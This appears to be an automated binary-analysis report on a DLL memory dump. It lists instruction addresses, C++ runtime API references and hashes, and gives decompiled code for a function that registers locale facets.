0x6d48f2c9
0x6d48f2ce
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f305
0x6d48f307
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d
0x6d48f280
0x6d48f280
0x6d48f283
0x6d48f287
0x6d48f28b
0x6d48f298
0x6d48f2a0
0x6d48f2a2
0x00000000
0x6d48f2a2
0x6d48f269
0x6d48f269
0x00000000
0x6d48f269
0x6d48f267
0x6d48f1da
0x6d48f1da
0x6d48f1dd
0x6d48f1e1
0x6d48f1e5
0x6d48f1f2
0x6d48f1fa
0x6d48f1fc
0x00000000
0x6d48f1fc
0x6d48f1c3
0x6d48f1c3
0x00000000
0x6d48f1c3
0x6d48f1c1
0x6d48f134
0x6d48f134
0x6d48f137
0x6d48f13b
0x6d48f13f
0x6d48f14c
0x6d48f154
0x6d48f156
0x00000000
0x6d48f156
0x6d48f11d
0x6d48f11d
0x00000000
0x6d48f11d
0x6d48f11b
0x6d48f08e
0x6d48f08e
0x6d48f091
0x6d48f095
0x6d48f099
0x6d48f0a6
0x6d48f0ae
0x6d48f0b0
0x00000000
0x6d48f0b0
0x6d48f077
0x6d48f077
0x00000000
0x6d48f077
0x6d48f075
0x6d48efe8
0x6d48efe8
0x6d48efeb
0x6d48efef
0x6d48eff3
0x6d48f000
0x6d48f008
0x6d48f00a
0x00000000
0x6d48f00a
0x6d48efd1
0x6d48efd1
0x00000000
0x6d48efd1
0x6d48efcf
0x6d48ef42
0x6d48ef42
0x6d48ef45
0x6d48ef49
0x6d48ef4d
0x6d48ef5a
0x6d48ef62
0x6d48ef64
0x00000000
0x6d48ef64
0x6d48ef2b
0x6d48ef2b
0x00000000
0x6d48ef2b
0x6d48ef29

APIs

__EH_prolog3.LIBCMT ref: 6D48EEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6D48EEFC
int.LIBCPMT ref: 6D48EF13

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

codecvt.LIBCPMT ref: 6D48EF36
std::_Facet_Register.LIBCPMT ref: 6D48EF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48EF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48EF8B

Strings

0kTm, xrefs: 6D48EF07

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0kTm
API String ID: 2594415655-2017035977
Opcode ID: b479595bd64451414fc5f5eff7f65acf8fa3875b19a8811c15f31756a6e00f23
Instruction ID: 5edb5cddff7e3147791719e4d4a68837ad2a3d9fc495d5af9764bec856da8efe
Opcode Fuzzy Hash: b479595bd64451414fc5f5eff7f65acf8fa3875b19a8811c15f31756a6e00f23
Instruction Fuzzy Hash: A311C175808665DBCF04EB60C840FEEB7B5AF54314F1A401CE611B7292CB71DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t418 - 0x14, 0);
				_t399 =  *0x6d546dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6D46161C(0x6d546d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6D4866BA(_t418 - 0x14);
					return E6D4A0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6D4912B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t418 - 0x20);
							E6D4A3D74(_t418 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t389, _t399, 0x14);
							E6D486653(_t418 - 0x14, 0);
							_t400 =  *0x6d546dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6D46161C(0x6d546d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6D4866BA(_t418 - 0x14);
								return E6D4A0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6D491339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t418 - 0x20);
										E6D4A3D74(_t418 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t296, _t390, _t400, 0x14);
										E6D486653(_t418 - 0x14, 0);
										_t401 =  *0x6d546db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6D46161C(0x6d546d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6D4866BA(_t418 - 0x14);
											return E6D4A0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6D4913A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t418 - 0x20);
													E6D4A3D74(_t418 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t296, _t391, _t401, 0x14);
													E6D486653(_t418 - 0x14, 0);
													_t402 =  *0x6d546ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6D46161C(0x6d546d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6D4866BA(_t418 - 0x14);
														return E6D4A0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6D491409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t418 - 0x20);
																E6D4A3D74(_t418 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t296, _t392, _t402, 0x14);
																E6D486653(_t418 - 0x14, 0);
																_t403 =  *0x6d546de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6D46161C(0x6d546d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6D4866BA(_t418 - 0x14);
																	return E6D4A0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6D491471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t418 - 0x20);
																			E6D4A3D74(_t418 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t296, _t393, _t403, 0x14);
																			E6D486653(_t418 - 0x14, 0);
																			_t404 =  *0x6d546dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6D46161C(0x6d546da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6D4866BA(_t418 - 0x14);
																				return E6D4A0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6D4914EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t418 - 0x20);
																						E6D4A3D74(_t418 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t296, _t394, _t404, 0x14);
																						E6D486653(_t418 - 0x14, 0);
																						_t405 =  *0x6d546dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6D46161C(0x6d546d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6D4866BA(_t418 - 0x14);
																							return E6D4A0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6D491558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t418 - 0x20);
																									E6D4A3D74(_t418 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t296, _t395, _t405, 0x14);
																									E6D486653(_t418 - 0x14, 0);
																									_t406 =  *0x6d546e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6D46161C(0x6d546dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6D4866BA(_t418 - 0x14);
																										return E6D4A0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6D4915C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t418 - 0x20);
																												E6D4A3D74(_t418 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t296, _t396, _t406, 0x14);
																												E6D486653(_t418 - 0x14, 0);
																												_t407 =  *0x6d546dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6D46161C(0x6d546d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6D46171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6D4866BA(_t418 - 0x14);
																													return E6D4A0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6D49162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6D461438(_t359);
																															E6D4A3D74(_t418 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6d4ec0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6D49542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6D4A0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6D486FD3(__eflags, _t397);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6d546dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6D486FD3(__eflags, _t396);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6d546e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6D486FD3(__eflags, _t395);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6d546dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6D486FD3(__eflags, _t394);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6d546dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6D486FD3(__eflags, _t393);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6d546de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6D486FD3(__eflags, _t392);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6d546ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6D486FD3(__eflags, _t391);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6d546db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6D486FD3(__eflags, _t390);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6d546dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6D486FD3(__eflags, _t389);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6d546dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

0x6d48f759
0x6d48f759
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78a
0x6d48f78f
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
